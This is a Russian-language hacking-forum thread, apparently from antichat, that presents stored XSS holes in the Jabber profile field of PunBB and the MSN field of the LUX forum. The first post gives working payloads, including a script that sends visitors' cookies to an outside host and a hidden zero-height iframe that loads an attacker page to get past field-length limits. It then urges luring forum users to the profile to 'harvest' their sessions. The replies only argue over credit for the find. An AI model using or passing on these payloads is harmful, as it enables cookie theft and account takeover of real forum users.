![]() |
XSS в форумах PunBB и LUX
И опять дыра в профиле....что в принципе хорошо, для нас=)
1 уязвимость найдена мной в форуме punbb, позволяет вставить скрипт, в поле Jabber, что находится в профиле. Так как длинна ограничена 75 символами, следует кроме банального алерта Код:
"><script>alert('')</script>Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>и в корневую папку кинем html`овский файл index.html, со строкой Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>Код:
"><iframe src=http://r.h15.ru/index.html height=0></iframe>Осталось только заманить пользователей форума заглянуть в твой профайл, и можно идти собирать урожай=) 2 уязвимость найдена в форуме lux. Форум итальянский, и довольно распостраненный, у итальянцев. Тут, поле подверженное нашему воздействию называется MSN, количество вводимых символов ограничено 40, вставляем сплойт Код:
"><iframe src=http://r.15.ru/ height=0> |
Вообщето, это было на securitylab.ru...
|
Цитата:
Баги нашел я, и нашел я их до публикации на секлабе, следует описать их тут я имею право. |
А вот какой я крутой! )) (щутка)
я там нашел вложеные теги. Сейчас сделаем видео... |
| Время: 10:14 |